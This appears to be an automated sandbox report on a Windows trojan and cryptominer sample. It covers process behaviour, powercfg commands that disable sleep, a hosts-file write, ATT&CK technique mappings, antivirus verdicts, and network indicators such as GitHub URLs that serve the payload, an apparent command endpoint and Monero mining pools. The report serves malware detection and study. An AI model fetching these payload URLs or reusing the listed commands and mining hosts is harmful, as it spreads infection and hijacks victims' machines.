                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_0000000140001B54
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,22_2_000001E858987960
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\system64x.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\system64x.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\system64x.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\system64x.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\system64x.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: dialer.exe, 0000002F.00000002.3603906840.0000025545DE9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (11) | DLL Side-Loading (1) | DLL Side-Loading (1) | File and Directory Permissions Modification (1) | Credential API Hooking (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (2) | Windows Service (11) | Access Token Manipulation (1) | Disable or Modify Tools (11) | LSASS Memory | File and Directory Discovery (3) | Remote Desktop Protocol | Credential API Hooking (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Service Execution (1) | Logon Script (Windows) | Windows Service (11) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | System Information Discovery (24) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Process Injection (713) | Obfuscated Files or Information (21) | NTDS | Security Software Discovery (441) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (3) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (2) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Application Layer Protocol (4) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (141) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | File Deletion (1) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Rootkit (4) | Proc Filesystem | Remote System Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Masquerading (121) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Virtualization/Sandbox Evasion (141) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Access Token Manipulation (1) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Process Injection (713) | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | Hidden Files and Directories (1) | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
Behavior Graph (interactive graph not reproduced): ID 1473042, Sample: SecuriteInfo.com.Win32.Malw..., Startdate: 14/07/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | 47% | ReversingLabs | Win32.Trojan.Boxter
SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | 100% | Avira | TR/Redcap.owywe
SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Windows\SysWOW64\system64x.exe | 100% | Avira | TR/Kryptik.byulc
C:\ProgramData\Google\Chrome\updater.exe | 100% | Avira | TR/Kryptik.byulc
C:\ProgramData\Google\Chrome\updater.exe | 92% | ReversingLabs | Win64.Packed.Generic
C:\Windows\SysWOW64\system64x.exe | 92% | ReversingLabs | Win64.Packed.Generic
C:\Windows\Temp\voeeoiqrjnla.sys | 5% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://github.com | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php | 0% | Avira URL Cloud | safe
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true | 0% | Avira URL Cloud | safe
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/wsdl/erties | 0% | Avira URL Cloud | safe
http://www.microsoft.coA | 0% | Avira URL Cloud | safe
https://172.94.1q | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/ws/2004/09/policy | 0% | Avira URL Cloud | safe
https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php--cinit | 0% | Avira URL Cloud | safe
http://github.com | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/wsdl/soap12/ | 0% | Avira URL Cloud | safe
https://github.com( | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5h | 0% | Avira URL Cloud | safe
http://raw.githubusercontent.com | 0% | Avira URL Cloud | safe
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe | 0% | Avira URL Cloud | safe
http://3csp.icrosof4m/ocp0 | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe | 0% | Avira URL Cloud | safe
https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw | 0% | Avira URL Cloud | safe
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blo | 0% | Avira URL Cloud | safe
http://Passport.NET/tb | 0% | Avira URL Cloud | safe
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.3 | true | false | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | false | | unknown
monerooceans.stream | 149.102.143.109 | true | true | | unknown
wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org | 172.67.206.184 | true | false | | unknown
gulf.moneroocean.stream | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php | false | Avira URL Cloud: safe | unknown
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true | false | Avira URL Cloud: safe | unknown
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003353000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003467000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://172.94.1q | dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.coA | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2432150701.000000001C83A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php--cinit | dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000346B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com( | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5h | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://3csp.icrosof4m/ocp0 | lsass.exe, 0000001F.00000000.2415950119.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3604819718.00000140AE074000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://xmrig.com/docs/algorithms | dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://Passport.NET/tb | svchost.exe, 00000037.00000000.2501565455.00000205FD288000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blo | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
172.67.206.184 | wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org | United States | 13335 | CLOUDFLARENETUS | false
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
149.102.143.109 | monerooceans.stream | United States | 174 | COGENT-174US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1473042
Start date and time: 2024-07-14 23:40:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 15
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
Detection: MAL
Classification: mal100.adwa.spyw.evad.mine.winEXE@65/86@4/4
EGA Information:
• Successful, ratio: 95.5%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, PID 612 because it is empty
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
Time | Type | Description
17:41:25 | API Interceptor | 42x Sleep call for process: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe modified
17:41:36 | API Interceptor | 1x Sleep call for process: system64x.exe modified
17:41:37 | API Interceptor | 34x Sleep call for process: powershell.exe modified
17:42:12 | API Interceptor | 343550x Sleep call for process: winlogon.exe modified
17:42:13 | API Interceptor | 273461x Sleep call for process: lsass.exe modified
17:42:15 | API Interceptor | 326636x Sleep call for process: dwm.exe modified
